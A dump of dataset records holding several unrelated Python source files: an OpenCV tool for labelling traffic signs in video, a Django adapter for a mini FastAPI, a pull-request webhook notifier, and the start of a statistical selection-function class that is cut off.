cv2.setTrackbarPos('Position', main_title_window, frame_index)
if mouse_down:
step += 1
# check to see if we have reached the end of the stream
if frame is None:
break
(H, W) = frame.shape[:2]
# check to see if we are currently tracking an object
if initBB is not None:
# grab the new bounding box coordinates of the object
(success, box) = tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
if (x + w) > 1900 or x < 5 or y > 900 or y < 0:
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
else:
cv2.rectangle(frame, (x, y), (x + w, y + h),
(0, 255, 0), 2)
print('tracking success! x, y, w, h = ', x, y, w, h)
# format (class_id xcen ycen w h)
x_cen = x + (w / 2)
y_cen = y + (h / 2)
boding_box_label = str(show_option_trafic_sign.class_id) + ' ' + str(x_cen / W) + ' ' + str(
y_cen / H) + ' ' + str(
w / W) + ' ' + str(h / H) + '\n'
label_file = os.path.join(folder_label, name_video + "." + str(frame_index) + ".txt")
image_file = os.path.join(folder_image, name_video + "." + str(frame_index) + ".jpg")
'''check file existed create new file for new object'''
while os.path.exists(label_file) and os.path.exists(image_file):
label_file = label_file.split('.')[0] + "_obj"
image_file = image_file.split('.')[0] + "_obj"
label_file = label_file + "." + str(frame_index) + ".txt"
image_file = image_file + "." + str(frame_index) + ".jpg"
f_label_image_write = open(label_file, 'w')
f_label_image_write.write(boding_box_label)
cv2.imwrite(image_file, frame)
fps.update()
fps.stop()
info = [
("Tracker", tracker_type),
("Success", "Yes" if success else "No"),
("FPS", "{:.2f}".format(fps.fps())),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
# show the output frame
# H, W 1080 3840
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("d") or key == ord("D"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
elif key == ord("s") or key == ord("S"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
while initBB is None:
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
initBB = cv2.selectROI(main_title_window, frame, fromCenter=False,
showCrosshair=True)
if sum(initBB) == 0:
initBB = None
continue
# start OpenCV object tracker using the supplied bounding box
# coordinates, then start the FPS throughput estimator as well
while show_option_trafic_sign.class_id is None:
show_option_trafic_sign.label_window()
tracker.init(frame, initBB)
fps = FPS().start()
elif key == ord("c") or key == ord("C"):
path_image_cp = folder_image + '_cp_' + str(frame_index) + '/'
path_label_cp = folder_image + '_cp_' + str(frame_index) + '/'
shutil.copytree(folder_image, path_image_cp)
shutil.copytree(folder_label, path_label_cp)
elif key == ord("h") or key == ord("H"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
(H, W) = view_frame_help.shape[:2]
info = [
("Press q or Q", "to quit program"),
("Press h or H", "view help"),
("Press c or C", "copy image data current to another folder"),
("Press g or G", "decrease 2 frame (Don't press while tracking)"),
("Press f or F", "increase 2 frame (Don't press while tracking)"),
("Press d or D", "delete bounding box of the object"),
("Press s or S", "select the bounding box of the object we want to track"),
("Press h or H", "to quit help"),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(view_frame_help, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("h") or key == ord("H"):
break
elif key == ord("f") or key == ord("F"):
if frame_index > 2:
frame_index -= 4
print('frame_index', frame_index)
elif key == ord("g") or key == ord("G"):
if frame_index < num_of_frame:
frame_index += 4
print('frame_index', frame_index)
elif key == ord("p") or key == ord("P"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(0) & 0xFF
if key == ord("p") or key == ord("P"):
break
time.sleep(1)
elif key == ord("q") or key == ord("Q"):
break
vs.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
'47400' | tracking_object_v0.1.py | from imutils.video import FPS
import imutils
import os
import cv2
import shutil
import time
import show_option_trafic_sign
import define
def on_pos_video_trackbar(val):
global vs, frame_index
if val != frame_index:
frame_index = val
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
print("Set Pos : ", val)
# function called by trackbar, sets the speed of playback
def setSpeed(val):
global playSpeed
playSpeed = max(val, 1)
def mouse_callback(event, x, y, flags, param):
global mouse_down
global step
if event == cv2.EVENT_LBUTTONDOWN:
if mouse_down is False:
mouse_down = True
step = 0
else:
step += 1
elif event == cv2.EVENT_LBUTTONUP and mouse_down:
mouse_down = False
main_title_window = "Video"
frame_index = 0
playSpeed = 250
mouse_down = False
step = 0
path_video = define.path_video
path_save_data = define.path_save_data
name_video = define.name_video
vs = cv2.VideoCapture(path_video)
if vs.isOpened() is False:
print("Open video false")
exit()
num_of_frame = int(vs.get(cv2.CAP_PROP_FRAME_COUNT))
pos_slider_max = num_of_frame
cv2.namedWindow(main_title_window, cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback(main_title_window, mouse_callback)
cv2.createTrackbar('Position', main_title_window, 0, pos_slider_max, on_pos_video_trackbar)
cv2.createTrackbar("Speed", "Video", playSpeed, 500, setSpeed)
def main():
global frame_index
global step
# Initial tracker video
tracker_type = "csrt" # csrt
OPENCV_OBJECT_TRACKERS = {
"csrt": cv2.TrackerCSRT_create, # higher object tracking accuracy and can tolerate slower FPS throughput
"kcf": cv2.TrackerKCF_create, # faster FPS throughput but can handle slightly lower object tracking accuracy
"boosting": cv2.TrackerBoosting_create,
"mil": cv2.TrackerMIL_create,
"tld": cv2.TrackerTLD_create,
"medianflow": cv2.TrackerMedianFlow_create,
"mosse": cv2.TrackerMOSSE_create
}
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
# initialize the bounding box coordinates of the object we are going
# to track
initBB = None
fps = None
start = True
view_left = False
view_right = False
# loop for choice view left or right
ret, frame_ori = vs.read()
print("Please press r(R) to view right window or e(E) to view left side window!")
while start:
view_frame = imutils.resize(frame_ori, width=1000)
text = 'Please press r(R) to view right window or e(E) to view left side window!'
(H, W) = view_frame.shape[:2]
cv2.putText(view_frame, text, (10, H - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("e") or key == ord("E"):
folder_image = path_save_data + '/image_left/'
folder_label = path_save_data + '/label_left/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_left = True
elif key == ord("r") or key == ord("R"):
folder_image = path_save_data + '/image_right/'
folder_label = path_save_data + '/label_right/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_right = True
# loop over frames from the video stream
while True:
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, frame_ori = vs.read()
(H_ori, W_ori) = frame_ori.shape[:2]
if view_left:
x_max_show = 1850
y_max_show = 900
x_min_show = 0
y_min_show = 0
frame = frame_ori[:int(H_ori), :int(W_ori / 2)]
elif view_right:
x_max_show = 3800
y_max_show = 900
x_min_show = 1920
y_min_show = 0
frame = frame_ori[:int(H_ori), int(W_ori / 2):]
view_frame = frame_ori[y_min_show:y_max_show, x_min_show:x_max_show]
frame_index += 1
cv2.setTrackbarPos('Position', main_title_window, frame_index)
if mouse_down:
step += 1
# check to see if we have reached the end of the stream
if frame is None:
break
(H, W) = frame.shape[:2]
# check to see if we are currently tracking an object
if initBB is not None:
# grab the new bounding box coordinates of the object
(success, box) = tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
if (x + w) > 1900 or x < 5 or y > 900 or y < 0:
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
else:
cv2.rectangle(frame, (x, y), (x + w, y + h),
(0, 255, 0), 2)
print('tracking success! x, y, w, h = ', x, y, w, h)
# format (class_id xcen ycen w h)
x_cen = x + (w / 2)
y_cen = y + (h / 2)
boding_box_label = str(show_option_trafic_sign.class_id) + ' ' + str(x_cen / W) + ' ' + str(
y_cen / H) + ' ' + str(
w / W) + ' ' + str(h / H) + '\n'
label_file = os.path.join(folder_label, name_video + "." + str(frame_index) + ".txt")
image_file = os.path.join(folder_image, name_video + "." + str(frame_index) + ".jpg")
'''check file existed create new file for new object'''
while os.path.exists(label_file) and os.path.exists(image_file):
label_file = label_file.split('.')[0] + "_obj"
image_file = image_file.split('.')[0] + "_obj"
label_file = label_file + "." + str(frame_index) + ".txt"
image_file = image_file + "." + str(frame_index) + ".jpg"
f_label_image_write = open(label_file, 'w')
f_label_image_write.write(boding_box_label)
cv2.imwrite(image_file, frame)
fps.update()
fps.stop()
info = [
("Tracker", tracker_type),
("Success", "Yes" if success else "No"),
("FPS", "{:.2f}".format(fps.fps())),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
# show the output frame
# H, W 1080 3840
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("d") or key == ord("D"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
elif key == ord("s") or key == ord("S"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
while initBB is None:
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
initBB = cv2.selectROI(main_title_window, frame, fromCenter=False,
showCrosshair=True)
if sum(initBB) == 0:
initBB = None
continue
# start OpenCV object tracker using the supplied bounding box
# coordinates, then start the FPS throughput estimator as well
while show_option_trafic_sign.class_id is None:
show_option_trafic_sign.label_window()
tracker.init(frame, initBB)
fps = FPS().start()
elif key == ord("c") or key == ord("C"):
path_image_cp = folder_image + '_cp_' + str(frame_index) + '/'
path_label_cp = folder_image + '_cp_' + str(frame_index) + '/'
shutil.copytree(folder_image, path_image_cp)
shutil.copytree(folder_label, path_label_cp)
elif key == ord("h") or key == ord("H"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
(H, W) = view_frame_help.shape[:2]
info = [
("Press q or Q", "to quit program"),
("Press h or H", "view help"),
("Press c or C", "copy image data current to another folder"),
("Press g or G", "decrease 2 frame (Don't press while tracking)"),
("Press f or F", "increase 2 frame (Don't press while tracking)"),
("Press d or D", "delete bounding box of the object"),
("Press s or S", "select the bounding box of the object we want to track"),
("Press h or H", "to quit help"),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(view_frame_help, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("h") or key == ord("H"):
break
elif key == ord("f") or key == ord("F"):
if frame_index > 2:
frame_index -= 4
print('frame_index', frame_index)
elif key == ord("g") or key == ord("G"):
if frame_index < num_of_frame:
frame_index += 4
print('frame_index', frame_index)
elif key == ord("p") or key == ord("P"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(0) & 0xFF
if key == ord("p") or key == ord("P"):
break
time.sleep(1)
elif key == ord("q") or key == ord("Q"):
break
vs.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
'47400' | 0.366363 | 0.223854 |
from typing import Any, Callable, Coroutine, Dict, List, Optional, Sequence, Type, Union
from django.urls import re_path
from django.views.decorators.csrf import csrf_exempt
from django.http import Http404, HttpResponseNotAllowed
from .fastapi import FastAPI
from .fastapi.params import Depends
from .fastapi.exceptions import HTTPException
from .fastapi.datastructures import Default
from .base import HTMLResponse, Request, Response, JSONResponse
from .route import BaseRoute
import logging
_logger = logging.getLogger(__name__)
RAPIDOC_PAGE_TPL = """
<!doctype html> <!-- Important: must specify -->
<html>
<head>
<title>{title} - RapiDoc</title>
<meta charset="utf-8"> <!-- Important: rapi-doc uses utf8 charecters -->
<script type="module" src="https://unpkg.com/rapidoc/dist/rapidoc-min.js"></script>
</head>
<body>
<rapi-doc
spec-url="{openapi_url}"
sort-endpoints-by="method"
render-style="read"
> </rapi-doc>
</body>
</html>
"""
class OpenAPI(FastAPI):
def __init__(
self,
*,
debug: bool = False,
routes: Optional[List[BaseRoute]] = None,
title: str = "Django mini FastAPI",
description: str = "",
version: str = "0.1.0",
openapi_url: Optional[str] = "/openapi.json",
openapi_tags: Optional[List[Dict[str, Any]]] = None,
servers: Optional[List[Dict[str, Union[str, Any]]]] = None,
dependencies: Optional[Sequence[Depends]] = None,
default_response_class: Type[Response] = Default(JSONResponse),
docs_url: Optional[str] = "/docs",
redoc_url: Optional[str] = "/redoc",
rapidoc_url: Optional[str] = "/rapidoc",
swagger_ui_oauth2_redirect_url: Optional[str] = "/docs/oauth2-redirect",
swagger_ui_init_oauth: Optional[Dict[str, Any]] = None,
exception_handlers: Optional[
Dict[
Union[int, Type[Exception]],
Callable[[Request, Any], Coroutine[Any, Any, Response]],
]
] = None,
terms_of_service: Optional[str] = None,
contact: Optional[Dict[str, Union[str, Any]]] = None,
license_info: Optional[Dict[str, Union[str, Any]]] = None,
root_path: str = "",
root_path_in_servers: bool = True,
responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None,
callbacks: Optional[List[BaseRoute]] = None,
deprecated: Optional[bool] = None,
include_in_schema: bool = True,
**extra: Any
) -> None:
super().__init__(
debug=debug,
routes=routes,
title=title,
description=description,
version=version,
openapi_url=openapi_url,
openapi_tags=openapi_tags,
servers=servers,
dependencies=dependencies,
default_response_class=default_response_class,
docs_url=docs_url,
redoc_url=redoc_url,
swagger_ui_oauth2_redirect_url=swagger_ui_oauth2_redirect_url,
swagger_ui_init_oauth=swagger_ui_init_oauth,
exception_handlers=exception_handlers,
terms_of_service=terms_of_service,
contact=contact,
license_info=license_info,
root_path=root_path,
root_path_in_servers=root_path_in_servers,
responses=responses,
callbacks=callbacks,
deprecated=deprecated,
include_in_schema=include_in_schema,
**extra
)
self.rapidoc_url = rapidoc_url
if self.openapi_url and self.rapidoc_url:
def rapi_doc_html(req: Request) -> HTMLResponse:
root_path = self.root_path.rstrip("/")
openapi_url = root_path + self.openapi_url
return HTMLResponse(
RAPIDOC_PAGE_TPL.format(title=self.title, openapi_url=openapi_url)
)
self.add_route(self.rapidoc_url, rapi_doc_html, include_in_schema=False)
def as_django_url_pattern(self):
return re_path(
"^{prefix_path}/(?P<route_path>.*)".format(
prefix_path=self.root_path.strip("/")
),
self.as_django_view(),
)
def as_django_view(self):
@csrf_exempt
def dispatcher(request: Request, route_path: str):
route_path = self.root_path + "/" + route_path.strip("/")
matched_route = None
matched_route_path_kwargs = None
method_not_allowed_routes: List[BaseRoute] = []
try:
for route in self.router.routes:
path_kwargs: Optional[Dict[str, str]] = route.match_path(route_path)
# path regex not matched
if path_kwargs is None:
continue
# found 1st full matched route, break here
if route.check_method_allowed(request.method):
matched_route = route
matched_route_path_kwargs = path_kwargs
break
else:
method_not_allowed_routes.append(route)
else:
# no break after scanned all routes
if method_not_allowed_routes:
raise HTTPException(405)
else:
raise HTTPException(404)
request.path_kwargs = matched_route_path_kwargs
return matched_route(request)
except Exception as e:
exc_handler = self.exception_handlers.get(type(e))
if exc_handler:
return exc_handler(request, e)
raise e
return dispatcher
def add_exception_handler(self, exc_cls: Type[Exception], fn: Callable):
self.exception_handlers[exc_cls] = fn
def exception_handler(self, exc_cls: Type[Exception]) -> Callable:
def _decorated(fn: Callable) -> Callable:
self.add_exception_handler(exc_cls=exc_cls, fn=fn)
return _decorated | django_mini_fastapi/api.py | from typing import Any, Callable, Coroutine, Dict, List, Optional, Sequence, Type, Union
from django.urls import re_path
from django.views.decorators.csrf import csrf_exempt
from django.http import Http404, HttpResponseNotAllowed
from .fastapi import FastAPI
from .fastapi.params import Depends
from .fastapi.exceptions import HTTPException
from .fastapi.datastructures import Default
from .base import HTMLResponse, Request, Response, JSONResponse
from .route import BaseRoute
import logging
_logger = logging.getLogger(__name__)
RAPIDOC_PAGE_TPL = """
<!doctype html> <!-- Important: must specify -->
<html>
<head>
<title>{title} - RapiDoc</title>
<meta charset="utf-8"> <!-- Important: rapi-doc uses utf8 charecters -->
<script type="module" src="https://unpkg.com/rapidoc/dist/rapidoc-min.js"></script>
</head>
<body>
<rapi-doc
spec-url="{openapi_url}"
sort-endpoints-by="method"
render-style="read"
> </rapi-doc>
</body>
</html>
"""
class OpenAPI(FastAPI):
def __init__(
self,
*,
debug: bool = False,
routes: Optional[List[BaseRoute]] = None,
title: str = "Django mini FastAPI",
description: str = "",
version: str = "0.1.0",
openapi_url: Optional[str] = "/openapi.json",
openapi_tags: Optional[List[Dict[str, Any]]] = None,
servers: Optional[List[Dict[str, Union[str, Any]]]] = None,
dependencies: Optional[Sequence[Depends]] = None,
default_response_class: Type[Response] = Default(JSONResponse),
docs_url: Optional[str] = "/docs",
redoc_url: Optional[str] = "/redoc",
rapidoc_url: Optional[str] = "/rapidoc",
swagger_ui_oauth2_redirect_url: Optional[str] = "/docs/oauth2-redirect",
swagger_ui_init_oauth: Optional[Dict[str, Any]] = None,
exception_handlers: Optional[
Dict[
Union[int, Type[Exception]],
Callable[[Request, Any], Coroutine[Any, Any, Response]],
]
] = None,
terms_of_service: Optional[str] = None,
contact: Optional[Dict[str, Union[str, Any]]] = None,
license_info: Optional[Dict[str, Union[str, Any]]] = None,
root_path: str = "",
root_path_in_servers: bool = True,
responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None,
callbacks: Optional[List[BaseRoute]] = None,
deprecated: Optional[bool] = None,
include_in_schema: bool = True,
**extra: Any
) -> None:
super().__init__(
debug=debug,
routes=routes,
title=title,
description=description,
version=version,
openapi_url=openapi_url,
openapi_tags=openapi_tags,
servers=servers,
dependencies=dependencies,
default_response_class=default_response_class,
docs_url=docs_url,
redoc_url=redoc_url,
swagger_ui_oauth2_redirect_url=swagger_ui_oauth2_redirect_url,
swagger_ui_init_oauth=swagger_ui_init_oauth,
exception_handlers=exception_handlers,
terms_of_service=terms_of_service,
contact=contact,
license_info=license_info,
root_path=root_path,
root_path_in_servers=root_path_in_servers,
responses=responses,
callbacks=callbacks,
deprecated=deprecated,
include_in_schema=include_in_schema,
**extra
)
self.rapidoc_url = rapidoc_url
if self.openapi_url and self.rapidoc_url:
def rapi_doc_html(req: Request) -> HTMLResponse:
root_path = self.root_path.rstrip("/")
openapi_url = root_path + self.openapi_url
return HTMLResponse(
RAPIDOC_PAGE_TPL.format(title=self.title, openapi_url=openapi_url)
)
self.add_route(self.rapidoc_url, rapi_doc_html, include_in_schema=False)
def as_django_url_pattern(self):
return re_path(
"^{prefix_path}/(?P<route_path>.*)".format(
prefix_path=self.root_path.strip("/")
),
self.as_django_view(),
)
def as_django_view(self):
@csrf_exempt
def dispatcher(request: Request, route_path: str):
route_path = self.root_path + "/" + route_path.strip("/")
matched_route = None
matched_route_path_kwargs = None
method_not_allowed_routes: List[BaseRoute] = []
try:
for route in self.router.routes:
path_kwargs: Optional[Dict[str, str]] = route.match_path(route_path)
# path regex not matched
if path_kwargs is None:
continue
# found 1st full matched route, break here
if route.check_method_allowed(request.method):
matched_route = route
matched_route_path_kwargs = path_kwargs
break
else:
method_not_allowed_routes.append(route)
else:
# no break after scanned all routes
if method_not_allowed_routes:
raise HTTPException(405)
else:
raise HTTPException(404)
request.path_kwargs = matched_route_path_kwargs
return matched_route(request)
except Exception as e:
exc_handler = self.exception_handlers.get(type(e))
if exc_handler:
return exc_handler(request, e)
raise e
return dispatcher
def add_exception_handler(self, exc_cls: Type[Exception], fn: Callable):
self.exception_handlers[exc_cls] = fn
def exception_handler(self, exc_cls: Type[Exception]) -> Callable:
def _decorated(fn: Callable) -> Callable:
self.add_exception_handler(exc_cls=exc_cls, fn=fn)
return _decorated | 0.75985 | 0.060335 |
from urlparse import urlparse
import json
import urllib
import urllib2
import requests
from vilya.config import DOMAIN
from vilya.models.pull import PullRequest
from vilya.models.ticket import Ticket
from vilya.libs.push_notification import send_alert
def __enter__(data):
author = data.get('author')
type_ = data.get('type')
ticket = data.get('ticket')
pullreq = data.get('pullreq')
hooks = data.get('hooks')
hook_urls = [hook.url for hook in hooks] if hooks else []
from_proj = pullreq.from_proj
to_proj = pullreq.to_proj
from_proj_dict = {
'url': from_proj.url,
'name': from_proj.name,
'description': from_proj.summary,
'from_ref': pullreq.from_ref,
'owner': {'name': from_proj.owner_name}
}
to_ref_dict = {
'url': to_proj.url,
'name': to_proj.name,
'description': to_proj.summary,
'from_ref': pullreq.to_ref,
'owner': {'name': to_proj.owner_name}
}
author_dict = {'name': author.name, 'url': author.url}
rdata = {
'type': type_,
'id': ticket.ticket_id,
'author': author_dict,
'from_proj': from_proj_dict,
'to_ref': to_ref_dict,
'url': ticket.url,
'title': ticket.title,
}
# FIXME: content 没定义,而且照目前的代码看,type_ in ('pr_merge', None), see views/uis/pull.py
if type_ == 'pr_opened':
rdata.update({
'title': data.get('title'),
'body': data.get('body'),
'ticket_id': data.get('ticket').id,
})
elif type_ == 'pr_merge':
rdata.update({
'commit_message': data.get('commit_message'),
})
elif type_ == 'pr_closed':
rdata.update({
'content': '',
})
# now... data is (hook_urls, rdata)
return hook_urls, rdata
def async_pr_hooks(args):
hooks, data = args
json_data = json.dumps(data)
for hook in hooks:
url = urlparse(hook)
if url.hostname and url.hostname.endswith('.slack.com'):
slack_data = gen_slack_incoming_webhooks_data(data)
s = requests.Session()
try:
s.post(hook, data=json.dumps(slack_data), timeout=30)
except Exception as e:
print "%s => %s" % (hook, e)
elif data.get('type') == 'pr_opened' and url.hostname and \
url.hostname.startswith('telchar'):
telchar_data = gen_telchar_data(data)
try:
requests.post(hook, data=telchar_data, timeout=30)
except Exception as e:
print "%s => %s" % (hook, e)
else:
try:
u = urllib2.urlopen(hook, urllib.urlencode({'data': json_data}))
u.read()
u.close()
except urllib2.URLError as e:
print "%s => %s" % (hook, e)
def async_push_notif(args):
hooks, data = args
msg = data.get('title')
to_proj = data.get('to_ref')
if to_proj.get('name') == 'iCode':
send_alert(msg)
def gen_telchar_data(data):
ticket_id = data.get('ticket_id')
ticket = Ticket.get(ticket_id)
pullreq = PullRequest.get_by_proj_and_ticket(
ticket.project.id, ticket.ticket_id)
fork_from = pullreq.from_proj.fork_from
fork_from = pullreq.from_proj.get(fork_from).url if fork_from else None
return {
'ticket_id': ticket.ticket_id,
'fork_from': fork_from,
'url': pullreq.from_proj.url,
'to_sha': pullreq.to_sha,
'from_sha': pullreq.from_sha
}
def gen_slack_incoming_webhooks_data(data):
type_ = data.get('type')
action_text_mapping = {
'pr_opened': 'opened',
'pr_merge': 'merged',
'pr_closed': 'closed',
}
if type_ not in action_text_mapping:
return {}
text = data.get('text', '')
author_dict = data.get('author', {})
author_url = author_dict.get('url', '')
author_name = author_dict.get('name', '')
pr_url = data.get('url', '')
pr_id = data.get('id', '')
pr_title = data.get('title', '')
to_ref_dict = data.get('to_ref', {})
to_proj_url = to_ref_dict.get('url', '')
to_proj_name = to_ref_dict.get('name', '')
author_link = '<{0}{1}|{2}>'.format(DOMAIN, author_url, author_name)
pr_link = '<{0}{1}|#{2} {3}>'.format(DOMAIN, pr_url, pr_id, pr_title)
to_proj_link = '<{0}{1}|{2}>'.format(DOMAIN, to_proj_url, to_proj_name)
action_text = action_text_mapping.get(type_)
text = 'Pull Request {0} on {1} is {2} by {3}'.format(
pr_link, to_proj_link, action_text, author_link)
data = {
'text': text,
'username': 'Code',
}
return data | dispatches/actions/pr_actions.py |
from urlparse import urlparse
import json
import urllib
import urllib2
import requests
from vilya.config import DOMAIN
from vilya.models.pull import PullRequest
from vilya.models.ticket import Ticket
from vilya.libs.push_notification import send_alert
def __enter__(data):
author = data.get('author')
type_ = data.get('type')
ticket = data.get('ticket')
pullreq = data.get('pullreq')
hooks = data.get('hooks')
hook_urls = [hook.url for hook in hooks] if hooks else []
from_proj = pullreq.from_proj
to_proj = pullreq.to_proj
from_proj_dict = {
'url': from_proj.url,
'name': from_proj.name,
'description': from_proj.summary,
'from_ref': pullreq.from_ref,
'owner': {'name': from_proj.owner_name}
}
to_ref_dict = {
'url': to_proj.url,
'name': to_proj.name,
'description': to_proj.summary,
'from_ref': pullreq.to_ref,
'owner': {'name': to_proj.owner_name}
}
author_dict = {'name': author.name, 'url': author.url}
rdata = {
'type': type_,
'id': ticket.ticket_id,
'author': author_dict,
'from_proj': from_proj_dict,
'to_ref': to_ref_dict,
'url': ticket.url,
'title': ticket.title,
}
# FIXME: content 没定义,而且照目前的代码看,type_ in ('pr_merge', None), see views/uis/pull.py
if type_ == 'pr_opened':
rdata.update({
'title': data.get('title'),
'body': data.get('body'),
'ticket_id': data.get('ticket').id,
})
elif type_ == 'pr_merge':
rdata.update({
'commit_message': data.get('commit_message'),
})
elif type_ == 'pr_closed':
rdata.update({
'content': '',
})
# now... data is (hook_urls, rdata)
return hook_urls, rdata
def async_pr_hooks(args):
hooks, data = args
json_data = json.dumps(data)
for hook in hooks:
url = urlparse(hook)
if url.hostname and url.hostname.endswith('.slack.com'):
slack_data = gen_slack_incoming_webhooks_data(data)
s = requests.Session()
try:
s.post(hook, data=json.dumps(slack_data), timeout=30)
except Exception as e:
print "%s => %s" % (hook, e)
elif data.get('type') == 'pr_opened' and url.hostname and \
url.hostname.startswith('telchar'):
telchar_data = gen_telchar_data(data)
try:
requests.post(hook, data=telchar_data, timeout=30)
except Exception as e:
print "%s => %s" % (hook, e)
else:
try:
u = urllib2.urlopen(hook, urllib.urlencode({'data': json_data}))
u.read()
u.close()
except urllib2.URLError as e:
print "%s => %s" % (hook, e)
def async_push_notif(args):
hooks, data = args
msg = data.get('title')
to_proj = data.get('to_ref')
if to_proj.get('name') == 'iCode':
send_alert(msg)
def gen_telchar_data(data):
ticket_id = data.get('ticket_id')
ticket = Ticket.get(ticket_id)
pullreq = PullRequest.get_by_proj_and_ticket(
ticket.project.id, ticket.ticket_id)
fork_from = pullreq.from_proj.fork_from
fork_from = pullreq.from_proj.get(fork_from).url if fork_from else None
return {
'ticket_id': ticket.ticket_id,
'fork_from': fork_from,
'url': pullreq.from_proj.url,
'to_sha': pullreq.to_sha,
'from_sha': pullreq.from_sha
}
def gen_slack_incoming_webhooks_data(data):
type_ = data.get('type')
action_text_mapping = {
'pr_opened': 'opened',
'pr_merge': 'merged',
'pr_closed': 'closed',
}
if type_ not in action_text_mapping:
return {}
text = data.get('text', '')
author_dict = data.get('author', {})
author_url = author_dict.get('url', '')
author_name = author_dict.get('name', '')
pr_url = data.get('url', '')
pr_id = data.get('id', '')
pr_title = data.get('title', '')
to_ref_dict = data.get('to_ref', {})
to_proj_url = to_ref_dict.get('url', '')
to_proj_name = to_ref_dict.get('name', '')
author_link = '<{0}{1}|{2}>'.format(DOMAIN, author_url, author_name)
pr_link = '<{0}{1}|#{2} {3}>'.format(DOMAIN, pr_url, pr_id, pr_title)
to_proj_link = '<{0}{1}|{2}>'.format(DOMAIN, to_proj_url, to_proj_name)
action_text = action_text_mapping.get(type_)
text = 'Pull Request {0} on {1} is {2} by {3}'.format(
pr_link, to_proj_link, action_text, author_link)
data = {
'text': text,
'username': 'Code',
}
return data | 0.195517 | 0.175079 |
import attr
import scipy.special as sp
import numpy as np
from cached_property import cached_property
from scipy.integrate import quad
from scipy.optimize import minimize, brentq
from scipy.interpolate import (
InterpolatedUnivariateSpline as spline,
RectBivariateSpline,
)
from abc import ABCMeta, abstractmethod
@attr.s
class Selection(object):
"""
Abstract base class representing the selection function of the data used when fitting the generative DF.
Parameters
----------
vol_renorm : float
A single number which re-normalises the total volume of the sample. Useful for creating mock observations
tuned to a given output number of samples.
"""
__metaclass__ = ABCMeta
vol_renorm = attr.ib(default=1.0)
xmax = attr.ib(default=20.0, converter=lambda x: np.atleast_1d(np.array(x)))
xmin = attr.ib(default=0.0, converter=lambda x: np.atleast_1d(np.array(x)))
def __attrs_post_init__(self):
x = np.linspace(self.xmin, self.xmax, 1000)
veff = self.Veff(x)
if np.any(veff == 0) or np.any(np.isinf(veff)):
indx = np.where(np.logical_and(veff > 0, np.logical_not(np.isinf(veff))))[0]
print(
"Warning: xmin returns Veff(xmin)=0, setting xmin, xmax to %s, %s"
% (x[indx].min(), x[indx].max())
)
self.xmin = x[indx].min()
self.xmax = x[indx].max()
@xmin.validator
def _xmin_validator(self, att, val):
if np.any(val > self.xmax):
raise ValueError("xmin cannot be greater than xmax.")
if val.size != self.xmax.size:
raise ValueError("xmax and xmin must be of the same length")
@abstractmethod
def _veff_fnc(self, x):
raise NotImplementedError(
"The Selection abstract base class should not be instantiated directly"
)
@abstractmethod
def _veff_extrap(self, x):
return np.zeros_like(x)
def Veff(self, x):
"""
The effective volume of the observation for a set of properties x.
Parameters
----------
x : array-like
Either a 1D vector of an observed property, or a 2D vector, where the 2nd dimension corresponds to the different properties observed.
Returns
-------
V : array
A 1D vector, of the same length as x, giving the effective volume of the observation at that point in observation space.
"""
x = np.atleast_1d(x)
# Return vol-renormed function of veff_extrap outside observed region, and veff_fnc inside it.
return self.vol_renorm * np.where(
np.logical_or(x < self.xmin, x > self.xmax),
